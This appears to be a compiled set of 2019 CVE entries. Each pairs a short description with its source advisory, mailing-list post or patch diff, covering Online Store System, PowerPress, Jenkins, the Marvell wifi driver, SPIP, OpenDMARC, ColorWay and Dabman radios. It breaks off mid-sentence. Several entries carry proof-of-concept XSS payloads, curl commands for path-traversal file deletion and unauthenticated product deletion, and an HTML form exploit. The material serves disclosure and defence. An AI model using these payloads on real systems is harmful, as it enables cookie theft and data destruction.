Online Store System v1.0 delete_product.php doesn't check to see if a user authtenticated or has administrative rights allowing arbitrary product deletion.

Advisory #: 210

**Title:** Multiple vulnerabilities in Online store system v1.0 Stored XSS and unauthenticated product deletions.

**Author:** Larry W. Cashdollar

**Date:** 2019-09-18

**CVE-ID:**\[CVE-2019-8288\]\[CVE-2019-8289\]\[CVE-2019-8290\]\[CVE-2019-8291\]\[CVE-2019-8292\]

**CWE:**

**Download Site:** https://www.abcprintf.com/view\_download.php?id=17

**Vendor:** adcprintf

**Vendor Notified:** 2019-09-18

**Vendor Contact:** abcprintf@gmail.com

**Advisory:** http://www.vapidlabs.com/advisory.php?v=210

**Description:** "Online store system" is a drop in customizable electronic storefront. It has an administrative interface allowing user and product management.

**Vulnerability:**

The application contains stored XSS vulnerabilities throughout the form user\_view.php pages as none of the variables are sanitized before being presented back to the client. This can be exploited by a new user injecting cookie stealing code into their login information form and waiting for an administrative user to navigate to the users panel. CVE-2019-8288 159 echo '<td>'.$row\['adidas\_member\_user'\].'</td>'; CVE-2019-8289 160 echo '<td>'. $row\['adidas\_member\_email'\] . '</td>'; CVE-2019-8290 The registration form requirements for the member email format can be bypassed by posting directly to sent\_register.php allowing special characters to be included and an XSS payload to be injected. CVE-2019-8291 The code in delete\_file.php doesn't check to see if a user has administrative rights nor does it check for path traversal allowing a '..' to delete arbitrary files owned by the httpd process. CVE-2019-8292 The code in delete\_product.php doesn't check to see if a user has administrative rights before allowing them to delete a product from the database.

**Export:** JSON TEXT XML

**Exploit Code:**

1.  Set login name or email to "><script>alert(1);</script>
    
2.  $ curl -s cookie.txt -X POST -d "username\=jsmith&password\=jsmith123&email\=\\"><script>alert(1);</script>%40email.com" http://example.com/pso/sent\_register.php
    

5.  $ curl \-s cookie.txt "http://example.com/pso/admin/delete\_file.php?id=0&filename=../women.php"
    

7.  $ curl \-s cookie.txt http://example.com/pso/admin/product\_delete.php?id=4
    

**Screen Shots:**

**Notes:**

CVE-2019-8292: Larry Cashdollar Vulnerability

The Blubrry PowerPress Podcasting plugin 6.0.4 for WordPress has XSS via the tab parameter.

**Details**

Word Press Product Bugs Report  
Bug Name Cross Site Scripting (XSS)  
Software: Blubrry PowerPress Podcasting plugin  
Version: 6.0.4  
Last Updated: 27-08-2015  
Homepage: https://wordpress.org/plugins/powerpress/developers/  
Compatible Up to Wordpress 4.3.0 Version (Requires: 3.6 or higher)  
Severity High  
Description: Cross Site Scripting (XSS) vulnerability in WordPress plugin NextGen Gallery

**Proof of concept: (POC)**

Visit the following page on a site with this plugin installed. http://yourwordpresssite.com/wordpress/wp-admin/admin.php?page=powerpress/powerpressadmin\_basic.php and modify the value of tab variable with "></script><script>alert(document.cookie);</script> payload and send the request to the server.

Now, the added XSS payload will be echoed back from the server without validating the input. It also affects wp-config.php file, $table\_prefix and corrupts the database connectivity.

**Note:** XSS payload has been tried with the application once after implementing Unfiltered Html Settings as defined to wp-config.php file.

_**define( 'DISALLOW\_UNFILTERED\_HTML', true );**_

**Issue 1:**

The Post Request **tab** variable in the URL http://localhost/wordpress/wp-admin/admin.php?page=powerpress/powerpressadmin\_basic.php is vulnerable to Cross Site Scripting (XSS)

**Figure 1:** Invalid HTTP script Request sent to the server through the vulnerable **tab** variable in the URL http://yourwordpresssite.com/wordpress/wp-admin/admin.php?page=powerpress/powerpressadmin\_basic.php and its echoed back in the HTTP Response without validation.

**Reproducing Steps**

1.  Logon into any wordpress application (localhost or public host)
2.  Modifying the value of tab variable in Blubrry PowerPress Version 6.0.4
3.  Fill all the variables with "></script><script>alert(document.cookie);</script> payload and send the request to the server.
4.  Now, the added XSS payload will be echoed back from the server without validating the input even after wp-config.php file has been configured with XSS filter settings.

**Timeline**

2015-09-04 – Discovered in Blubrry PowerPress Podcasting plugin 6.0.4 version.  
2015-09-04 – Reported to plugins@wordpress.org  
2015-09-07 – Vendor Responded, "Thank you for reporting this plugin. We're looking into it right now."  
2015-09-09 – Fixed in Blubrry PowerPress Podcasting plugin 6.0.5 version.

**Discovered by:**  
Sathish from Cyber Security Works Pvt Ltd

CVE-2015-9410: XSS Vulnerability in Blubrry PowerPress Podcasting plugin Version 6.0.4 · Issue #7 · cybersecurityworks/Disclosed

Jenkins 2.196 and earlier, LTS 2.176.3 and earlier did not escape the reason why a queue items is blcoked in tooltips, resulting in a stored XSS vulnerability exploitable by users able to control parts of the reason a queue item is blocked, such as label expressions not matching any idle executors.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[day\] \[month\] \[year\] \[list\]

Date: Wed, 25 Sep 2019 16:42:06 +0200
From: Daniel Beck <ml@...kweb.net>
To: oss-security@...ts.openwall.com
Subject: Multiple vulnerabilities in Jenkins and Jenkins plugins

Jenkins is an open source automation server which enables developers around
the world to reliably build, test, and deploy their software. The following
releases contain fixes for security vulnerabilities:

\* Jenkins weekly 2.197
\* Jenkins LTS 2.176.4 and 2.190.1
\* Aqua MicroScanner Plugin 1.0.8
\* Aqua Security Scanner Plugin 3.0.18
\* Data Theorem: CI/CD Plugin 1.4.0
\* Git Changelog Plugin 2.18
\* GitLab Logo Plugin 1.0.4
\* Inedo BuildMaster Plugin Plugin 2.5.0
\* Inedo ProGet Plugin Plugin 1.3
\* Log Parser Plugin 2.1
\* NeuVector Vulnerability Scanner Plugin version 1.6
\* Project Inheritance Plugin 19.08.02
\* Violation Comments to GitLab Plugin 2.29

Additionally, we announce unresolved security issues in the following
plugins:

\* Assembla Plugin
\* Azure Event Grid Build Notifier Plugin
\* Call Remote Job Plugin
\* CodeScan Plugin
\* elOyente Plugin
\* Gem Publisher Plugin
\* Google Calendar Plugin
\* Kubernetes :: Pipeline :: Arquillian Steps Plugin
\* Kubernetes :: Pipeline :: Kubernetes Steps Plugin
\* vFabric Application Director Plugin

Summaries of the vulnerabilities are below. More details, severity, and
attribution can be found here:
https://jenkins.io/security/advisory/2019-09-25/

We provide advance notification for security updates on this mailing list:
https://groups.google.com/d/forum/jenkinsci-advisories

If you discover security vulnerabilities in Jenkins, please report them as
described here:
https://jenkins.io/security/#reporting-vulnerabilities

---

SECURITY-1498 / CVE-2019-10401
Jenkins form controls include an expandable textbox that can transform
from a single-line text box to a multi-line text area.

The implementation of this transformation interpreted the text content of
the form field as HTML. This resulted in a cross-site scripting
vulnerability exploitable by attackers able to control the contents of
such f:expandableTextbox form controls.


SECURITY-1525 / CVE-2019-10402
Jenkins interpreted items added to f:combobox form controls as HTML. This
resulted in a cross-site scripting vulnerability exploitable by attackers
able to control the contents of f:combobox form controls.


SECURITY-1537 (1) / CVE-2019-10403
Jenkins did not escape the tag name on the tooltip for tag actions shown
in the build history. This resulted in a cross-site scripting
vulnerability exploitable by attackers able to control the SCM tag name
for these actions.


SECURITY-1537 (2) / CVE-2019-10404
Jenkins did not escape the reason a queue item is blocked in tooltips.
This resulted in a cross-site scripting vulnerability exploitable by
attackers able to control the reason a queue item is blocked, for example
a label expression that does not match idle executors.


SECURITY-1505 / CVE-2019-10405
Jenkins shows various technical information about the current user on the
/whoAmI URL. The information shown includes HTTP request headers.

This allowed attackers able to exploit another cross-site scripting
vulnerability to obtain the Cookie header’s value even if the HttpOnly
flag would prevent direct access via JavaScript.


SECURITY-1471 / CVE-2019-10406
Jenkins did not validate or otherwise limit the possible values
administrators could specify as Jenkins root URL.

This resulted in a cross-site scripting vulnerability exploitable by users
with Overall/Administer permission.


SECURITY-351 / CVE-2019-10407
Mask Passwords Plugin allows users to define secret environment variables
(typically passwords) to be passed to builds, both globally, and for
specific jobs. These environment variables are expected to not be shown.

Project Inheritance Plugin showed the variable values on its Full Build
Flow view and included them in the metadata download without masking.


SECURITY-401 / CVE-2019-10408 (CSRF), CVE-2019-10409 (permission check)
Project Inheritance Plugin allows the creation of projects based on
templates defined in the plugin configuration.

A missing permission check in the HTTP endpoint triggering project
creation allowed users with Overall/Read permission to create these
projects. Additionally, the HTTP endpoint did not require POST requests,
resulting in a CSRF vulnerability.


SECURITY-732 / CVE-2019-10410
Log Parser Plugin did not escape an error message shown when log parsing
patterns are invalid. This resulted in a persisted cross-site scripting
vulnerability exploitable by attackers able to control the log parsing
rules configuration, typically users with Job/Configure permission.

Jenkins applies the missing escaping by default since 2.146 and LTS
2.138.2, so newer Jenkins releases are not affected by this vulnerability.


SECURITY-1504 / CVE-2019-10430
NeuVector Vulnerability Scanner Plugin stored registry credentials
unencrypted in its global configuration file on the Jenkins master. These
credentials could be viewed by users with access to the master file system.


SECURITY-1507 / CVE-2019-10427
Aqua MicroScanner Plugin stores a token credential in its global Jenkins
configuration.

While the token is stored encrypted on disk, it was transmitted in plain
text as part of the configuration form. This could result in exposure of the
token through browser extensions, cross-site scripting vulnerabilities, and
similar situations.


SECURITY-1508 / CVE-2019-10428
Aqua Security Scanner Plugin stores a password in its global Jenkins
configuration.

While the password is stored encrypted on disk, it was transmitted in plain
text as part of the configuration form. This could result in exposure of the
password through browser extensions, cross-site scripting vulnerabilities,
and similar situations.


SECURITY-1513 / CVE-2019-10411
Inedo BuildMaster Plugin Plugin stores a service password in its global
Jenkins configuration.

While the password is stored encrypted on disk, it was transmitted in plain
text as part of the configuration form. This could result in exposure of the
password through browser extensions, cross-site scripting vulnerabilities,
and similar situations.


SECURITY-1514 / CVE-2019-10412
Inedo ProGet Plugin Plugin stores a service password in its global Jenkins
configuration.

While the password is stored encrypted on disk, it was transmitted in plain
text as part of the configuration form. This could result in exposure of the
password through browser extensions, cross-site scripting vulnerabilities,
and similar situations.


SECURITY-1557 / CVE-2019-10413
Data Theorem: CI/CD Plugin stored a proxy password unencrypted in job
config.xml files on the Jenkins master. This password could be viewed by
users with Extended Read permission, or access to the master file system.


SECURITY-1574 / CVE-2019-10414
Git Changelog Plugin stored MediaWiki and Jira passwords unencrypted in job
config.xml files on the Jenkins master. These passwords could be viewed by
users with Extended Read permission, or access to the master file system.


SECURITY-1575 / CVE-2019-10429
GitLab Logo Plugin stored a private token unencrypted in its global
configuration file on the Jenkins master. This token could be viewed by
users with access to the master file system.


SECURITY-1577 / CVE-2019-10415 (global password), CVE-2019-10416 (job password)
Violation Comments to GitLab Plugin stored API tokens unencrypted in job
config.xml files and its global configuration file on the Jenkins master.
These credentials could be viewed by users with Extended Read permission, or
access to the master file system.


SECURITY-920 (1) / CVE-2019-10417
Kubernetes :: Pipeline :: Kubernetes Steps Plugin defines a custom whitelist
for all scripts protected by the Script Security sandbox.

This custom whitelist allows the use of methods that can be used to bypass
Script Security sandbox protection. This results in arbitrary code execution
on any Jenkins instance with this plugin installed.

As of publication of this advisory, there is no fix.


SECURITY-920 (2) / CVE-2019-10418
Kubernetes :: Pipeline :: Arquillian Steps Plugin defines a custom whitelist
for all scripts protected by the Script Security sandbox.

This custom whitelist allows the use of methods that can be used to bypass
Script Security sandbox protection. This results in arbitrary code execution
on any Jenkins instance with this plugin installed.

As of publication of this advisory, there is no fix.


SECURITY-1541 / CVE-2019-10419
vFabric Application Director Plugin stores the Application Director password
unencrypted in its global configuration file on the Jenkins master. This
password can be viewed by users with access to the master file system.

As of publication of this advisory, there is no fix.


SECURITY-1543 / CVE-2019-10420
Assembla Plugin stores the Assembla password unencrypted in its global
configuration file on the Jenkins master. This password can be viewed by
users with access to the master file system.

As of publication of this advisory, there is no fix.


SECURITY-1544 / CVE-2019-10421
Azure Event Grid Build Notifier Plugin stores the Azure Event Grid secret
key unencrypted in job config.xml files on the Jenkins master. This key can
be viewed by users with Extended Read permission, or access to the master
file system.

As of publication of this advisory, there is no fix.


SECURITY-1548 / CVE-2019-10422
Call Remote Job Plugin stores a password unencrypted in job config.xml files
on the Jenkins master. This password can be viewed by users with Extended
Read permission, or access to the master file system.

As of publication of this advisory, there is no fix.


SECURITY-1551 / CVE-2019-10423
CodeScan Plugin stores an API key unencrypted in its global configuration
file on the Jenkins master. This API key can be viewed by users with access
to the master file system.

As of publication of this advisory, there is no fix.


SECURITY-1561 / CVE-2019-10424
elOyente Plugin stores a password unencrypted in its global configuration
file on the Jenkins master. This password can be viewed by users with access
to the master file system.

As of publication of this advisory, there is no fix.


SECURITY-1572 / CVE-2019-10425
Google Calendar Plugin stores a calendar password unencrypted in job
config.xml files on the Jenkins master. This password can be viewed by users
with Extended Read permission, or access to the master file system.

As of publication of this advisory, there is no fix.


SECURITY-1573 / CVE-2019-10426
Gem Publisher Plugin stores an API key unencrypted in its global
configuration file on the Jenkins master. This API key can be viewed by
users with access to the master file system.

As of publication of this advisory, there is no fix.

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2019-10404: security - Multiple vulnerabilities in Jenkins and Jenkins plugins

There is heap-based buffer overflow in kernel, all versions up to, excluding 5.3, in the marvell wifi chip driver in Linux kernel, that allows local users to cause a denial of service(system crash) or possibly execute arbitrary code.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[day\] \[month\] \[year\] \[list\]

Date: Wed, 28 Aug 2019 13:50:53 +0800
From: huangwen <huangwenabc@...il.com>
To: oss-security@...ts.openwall.com
Subject: Linux kernel: three heap overflow in the marvell wifi driver

Hi,

There are three heap-based buffer overflows in marvell wifi chip driver in
Linux kernel, allow local users to cause a denial

of service(system crash) or possibly execute arbitrary code.The bugs can be
triggered by sending crafted  packet via netlink.


Description

==========

\[1\]CVE-2019-14814:Heap Overflow in mwifiex\_set\_uap\_rates() function of
Marvell Wifi Driver in Linux kernel


The problem is inside mwifiex\_set\_uap\_rates() in
drivers/net/wireless/marvell/mwifiex/uap\_cmd.c.
There are two memcpy calls in this function to copy WLAN\_EID\_SUPP\_RATES
element and WLAN\_EID\_EXT\_SUPP\_RATES element

without checking length. The dst buffer bss\_cfg->rates is a array of length
MWIFIEX\_SUPPORTED\_RATES(14). The two elements in

cfg80211\_ap\_settings are from user space.



\[2\]CVE-2019-14815: Heap Overflow in mwifiex\_set\_wmm\_params() function of
Marvell Wifi Driver in Linux kernel


The problem is inside mwifiex\_set\_wmm\_params() in
drivers/net/wireless/marvell/mwifiex/uap\_cmd.c.
mwifiex\_set\_wmm\_params() calls memcpy to copy WLAN\_OUI\_MICROSOFT element to
bss\_cfg->wmm\_info without checking  length.

bss\_cfg->wmm\_info is struct mwifiex\_types\_wmm\_info type with fixed len 24.



\[3\]CVE-2019-14816:Heap Overflow in mwifiex\_update\_vs\_ie() function of
Marvell Wifi Driver in Linux kernel



The problem is inside mwifiex\_update\_vs\_ie() in
drivers/net/wireless/marvell/mwifiex/ie.c.

mwifiex\_set\_mgmt\_beacon\_data\_ies()  parses beacon IEs, probe response IEs,
association response IEs from cfg80211\_ap\_settings->beacon,

will call mwifiex\_update\_vs\_ie() twice for each IEs if there exists IEs.
For beacon\_ies as example, on the first call, mwifiex\_update\_vs\_ie() alloc

memory ie and then copy WLAN\_OUI\_MICROSOFT element to ie->ie\_buffer,
ie->ie\_buffer
is a array of length IEEE\_MAX\_IE\_SIZE(256); on the

Second call, mwifiex\_update\_vs\_ie() copy WLAN\_OUI\_WFA elment to
previous allocated
ie->ie\_buffer. If sum of  length of the two elements is

greater than IEEE\_MAX\_IE\_SIZE, will cause buffer overflow.



Patch

=====

https://lore.kernel.org/linux-wireless/20190828020751.13625-1-huangwenabc@gmail.com/

Credit

==========

This issue was discovered by huangwen of ADLab of Venustech

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2019-14816: security - Linux kernel: three heap overflow in the marvell wifi driver

SPIP before 3.1.11 and 3.2 before 3.2.5 mishandles redirect URLs in ecrire/inc/headers.php with a %0D, %0A, or %20 character.

@ -55,6 +55,10 @@ function redirige_par_entete($url, $equiv = '', $status = 302) {

	// ne pas laisser passer n'importe quoi dans l'url

	$url = str_replace(array('<', '"'), array('&lt;', '&quot;'), $url);

	$url = str_replace(array("\r", "\n", ' '), array('%0D', '%0A', '%20'), $url);

	while (strpos($url, '%0A') !== false) {

		$url = str_replace('%0A', '', $url);

	}

	// interdire les url inline avec des pseudo-protocoles :

	if (

		(preg_match(",data:,i", $url) and preg_match("/base64\s*,/i", $url))

CVE-2019-16393: spip

SPIP before 3.1.11 and 3.2 before 3.2.5 allows authenticated visitors to modify any published content and execute other modifications in the database. This is related to ecrire/inc/meta.php and ecrire/inc/securiser_action.php.

**4 changed files** with **41 additions** and **27 deletions**

1.  2
    
      ecrire/inc/meta.php
2.  18
    
      ecrire/inc/securiser\_action.php
3.  16
    
      ecrire/inc/utils.php
4.  32
    
      ecrire/index.php

@ -32,7 +32,7 @@ function inc_meta_dist($table = 'meta') {

	// en cas d'install ne pas faire confiance au meta_cache eventuel

	$cache = cache_meta($table);

	if ((_request('exec') !== 'install' or !test_espace_prive())

	if ((!$exec = _request('exec') or !autoriser_sans_cookie($exec))

		and $new = jeune_fichier($cache, _META_CACHE_TIME)

		and lire_fichier_securise($cache, $meta)

		and $meta = @unserialize($meta)

  

@ -184,14 +184,16 @@ function caracteriser_auteur($id_auteur = null) {

function _action_auteur($action, $id_auteur, $pass, $alea) {

	static $sha = array();

	if (!isset($sha[$id_auteur . $pass . $alea])) {

		if (!isset($GLOBALS['meta'][$alea]) and _request('exec') !== 'install') {

			include_spip('inc/acces');

			charger_aleas();

			if (empty($GLOBALS['meta'][$alea])) {

				include_spip('inc/minipres');

				echo minipres();

				spip_log("$alea indisponible");

				exit;

		if (!isset($GLOBALS['meta'][$alea])) {

			if (!$exec = _request('exec') or !autoriser_sans_cookie($exec)){

				include_spip('inc/acces');

				charger_aleas();

				if (empty($GLOBALS['meta'][$alea])){

					include_spip('inc/minipres');

					echo minipres();

					spip_log("$alea indisponible");

					exit;

				}

			}

		}

		include_spip('auth/sha256.inc');

  

@ -1644,14 +1644,24 @@ function find_all_in_path($dir, $pattern, $recurs = false) {

/**

 * Prédicat sur les scripts de ecrire qui n'authentifient pas par cookie

 * et beneficient d'une exception

 *

 * @param string $nom

 * @param bool $strict

 * @return bool

 */

function autoriser_sans_cookie($nom) {

function autoriser_sans_cookie($nom, $strict = false) {

	static $autsanscookie = array('install', 'base_repair');

	$nom = preg_replace('/.php[3]?$/', '', basename($nom));

	return in_array($nom, $autsanscookie);

	if (in_array($nom, $autsanscookie)) {

		if (test_espace_prive()){

			include_spip('base/connect_sql');

			if (!$strict or !spip_connect()){

				return true;

			}

		}

	}

	return false;

}

/**

  

@ -41,7 +41,7 @@ $reinstall = (!is_null(_request('reinstall'))) ? _request('reinstall') : ($exec

// Les scripts d'insallation n'authentifient pas, forcement,

// alors il faut blinder les variables d'URL

//

if (autoriser_sans_cookie($exec)) {

if (autoriser_sans_cookie($exec, false)) {

	if (!isset($reinstall)) {

		$reinstall = 'non';

	}

@ -64,20 +64,22 @@ $forcer_lang = true;

if (_request('action') or _request('var_ajax') or _request('formulaire_action')) {

	// Charger l'aiguilleur qui va mettre sur la bonne voie les traitements derogatoires

	include_spip('public/aiguiller');

	if (

		// cas des appels actions ?action=xxx

		traiter_appels_actions()

		or

		// cas des hits ajax sur les inclusions ajax

		traiter_appels_inclusions_ajax()

		or

		// cas des formulaires charger/verifier/traiter

		traiter_formulaires_dynamiques()

	) {

		exit;

	} // le hit est fini !

	if (!autoriser_sans_cookie($exec)){

		// Charger l'aiguilleur qui va mettre sur la bonne voie les traitements derogatoires

		include_spip('public/aiguiller');

		if (

			// cas des appels actions ?action=xxx

			traiter_appels_actions()

			or

			// cas des hits ajax sur les inclusions ajax

			traiter_appels_inclusions_ajax()

			or

			// cas des formulaires charger/verifier/traiter

			traiter_formulaires_dynamiques()

		){

			exit;

		} // le hit est fini !

	}

}

// securiser les redirect du back-office

if (_request('redirect')) {

CVE-2019-16391: spip

SPIP before 3.1.11 and 3.2 before 3.2.5 allows prive/formulaires/login.php XSS via error messages.

Browse Source

**ne rien laisser passer dans var\_erreur, c'est encore plus sur et de toute facon on attends pas de HTML ici (Boulouiz Youssouf)**

pull/9/head

**1 changed files** with **2 additions** and **2 deletions**

1.  4
    
      prive/formulaires/login.php

**

4

prive/formulaires/login.php



**

@ -138,8 +138,8 @@ function formulaires_login_charger_dist($cible = '', $login = '', $prive = null)

	} elseif ($erreur) {

		// une erreur d'un SSO indique dans la redirection vers ici

		// mais il faut se proteger de toute tentative d'injection malveilante

		include_spip('inc/texte');

		$valeurs['message_erreur'] = safehtml($erreur);

		include_spip('inc/filtres');

		$valeurs['message_erreur'] = textebrut($erreur);

	}

	return $valeurs;

CVE-2019-16392: spip

OpenDMARC through 1.3.2 and 1.4.x through 1.4.0-Beta1 is prone to a signature-bypass vulnerability with multiple From: addresses, which might affect applications that consider a domain name to be relevant to the origin of an e-mail message.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

CVE-2019-16378: security - OpenDMARC signature bypass with multiple From addresses

The colorway theme before 3.4.2 for WordPress has XSS via the contactName parameter.

Yorick Koster, July 2016

**Cross-Site Scripting vulnerability in ColorWay WordPress Theme****Abstract**

Multiple Cross-Site Scripting vulnerabilities were found in the ColorWay WordPress Theme. These issues allows an attacker to perform a wide variety of actions, such as stealing users' session tokens, or performing arbitrary actions on their behalf. In order to exploit this issue, the attacker has to lure/force a victim into opening a malicious website.

**Contact**

For feedback or questions about this advisory mail us at sumofpwn at securify.nl

**The Summer of Pwnage**

This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.

**OVE ID**

OVE-20160712-0024

**Tested versions**

These issues were successfully tested on ColorWay WordPress Theme version 3.4.1.

**Fix**

This issue is resolved in ColorWay WordPress Theme version 3.4.2.

**Introduction**

Colorway is simple, elegant, responsive WordPress Theme built by InkThemes.com. Multiple Cross-Site Scripting vulnerabilities were found in the ColorWay WordPress Theme. These issues allows an attacker to perform a wide variety of actions, such as stealing users' session tokens, or performing arbitrary actions on their behalf. In order to exploit this issue, the attacker has to lure/force a victim into opening a malicious website.

**Details**

These issues exists due to the lack of output encoding of user input. An example can be seen in the file _contact.php_. Several POST parameters are using in the output without applying proper encoding.

<form action="<?php the\_permalink(); ?>" id="contactForm" method="post">  
   <ul class="contactform">  
      <li>  
         <label for="contactName"><?php \_e('Name:', 'colorway'); ?></label>  
         <input type="text" name="contactName" id="contactName" value="<?php if (isset($\_POST\['contactName'\])) **echo $\_POST\['contactName'\];** ?>" class="required requiredField" />  
         <?php if ($nameError != '') { ?>  
            <span class="error"> <?php echo $nameError; ?> </span>  
         <?php } ?>  
      </li>  
      <li>  
         <label for="email"><?php \_e('Email', 'colorway'); ?></label>  
         <input type="text" name="email" id="email" value="<?php if (isset($\_POST\['email'\])) **echo $\_POST\['email'\];** ?>" class="required requiredField email" />  
         <?php if ($emailError != '') { ?>  
            <span class="error"> <?php echo $emailError; ?> </span>  
         <?php } ?>  
      </li>  
      <li>  
         <label for="commentsText"><?php \_e('Message:', 'colorway'); ?></label>  
         <textarea name="comments" id="commentsText" rows="20" cols="30" class="required requiredField"><?php  
            if (isset($\_POST\['comments'\])) {  
               if (function\_exists('stripslashes')) {  
                  **echo stripslashes($\_POST\['comments'\]);**  
               } else {  
                  **echo $\_POST\['comments'\];**  
               }  
            }  
         ?>  
         </textarea>  
         <?php if ($commentError != '') { ?>  
            <span class="error"> <?php echo $commentError; ?> </span>  
         <?php } ?>  
      </li>  
      <li>  
         <input type="submit" value="<?php \_e('Send Email', 'colorway'); ?>"/>  
      </li>  
   </ul>  
   <input type="hidden" name="submitted" id="submitted" value="true" />  
</form>

**Proof of concept**

<html>  
   <body>  
      <form action="http://<target>/contact/" method="POST">  
         <input type="hidden" name="contactName" value="&quot;><script>alert(document.cookie);</script>" />  
         <input type="hidden" name="email" value="" />  
         <input type="hidden" name="comments" value="                                                " />  
         <input type="hidden" name="submitted" value="true" />  
         <input type="submit" value="Submit request" />  
      </form>  
   </body>  
</html>

CVE-2016-10961: Summer of Pwnage! July 1-29, Amsterdam.

TELESTAR Bobs Rock Radio, Dabman D10, Dabman i30 Stereo, Imperial i110, Imperial i150, Imperial i200, Imperial i200-cd, Imperial i400, Imperial i450, Imperial i500-bt, and Imperial i600 TN81HH96-g102h-g102 devices have insufficient access control for the /set_dname, /mylogo, /LocalPlay, /irdevice.xml, /Sendkey, /setvol, /hotkeylist, /init, /playlogo.jpg, /stop, /exit, /back, and /playinfo commands.

Document Title: =============== Dabman & Imperial (i&d) - Multiple Vulnerabilities References (Source): ==================== https://www.vulnerability-lab.com/get\_content.php?id=2183 Video: https://www.vulnerability-lab.com/get\_content.php?id=2190 Vulnerability Magazine: https://www.vulnerability-db.com/?q=articles/2019/09/09/imperial-dabman-internet-radio-undocumented-telnetd-code-execution http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13473 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13474 CVE-ID: ======= CVE-2019-13473 Release Date: ============= 2019-09-09 Vulnerability Laboratory ID (VL-ID): ==================================== 2183 Common Vulnerability Scoring System: ==================================== 9.9 Vulnerability Class: ==================== Multiple Current Estimated Price: ======================== 10.000€ - 25.000€ Product & Service Introduction: =============================== Since 1993, TELESTAR has been synonymous with quality and a very good price/performance ratio in the consumer electronics segment. TELESTAR-DIGITAL GmbH distributes high-quality reception technology for digital TV reception via satellite (DVB-S), cable (DVBC) or terrestrial (DVB-T) from its headquarters in the Vulkaneifel region of Germany. The product portfolio includes digital receivers and the latest generation of television sets as well as modern distribution and single-cable technology, satellite to IP reception solutions and radio transmission systems. The product range is rounded off by Germany's most comprehensive range of accessories for digital television reception. (Copy of the Homepage: https://www.xing.com/companies/telestar-digitalgmbh ) Abstract Advisory Information: ============================== The vulnerability laboratory research team discovered multiple vulnerabilities in the dabman and imperial web radio devices series (typ d & i). Vulnerability Disclosure Timeline: ================================== 2019-06-01: Researcher Notification & Coordination (Security Researcher) 2019-06-02: Vendor Notification (Telestar Digital Data Security Department) 2019-06-07: Vendor Response/Feedback (Telestar Digital Data Security Department) 2019-08-30: Vendor Fix/Patch (Service Developer Team) 2019-09-08: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Critical Authentication Type: ==================== Pre Auth (No Privileges or Session) User Interaction: ================= No User Interaction Disclosure Type: ================ Coordinated Disclosure Technical Details & Description: ================================ 1.1 The dabman and imperial manufactured web radio series (typ d & i) suffers from a weak password vulnerability. The vulnerabilites allows local and remote attackers to compromise the web radios full embedded linux busybox os. The vulnerability is located within an undocumented telnet service (telnetd) of the linux busybox and is turned permanently on. The telnetd service uses weak passwords with hardcoded credentials on the local embedded linux busybox of the internet radio devices. The telnet password can be cracked by usage of simple 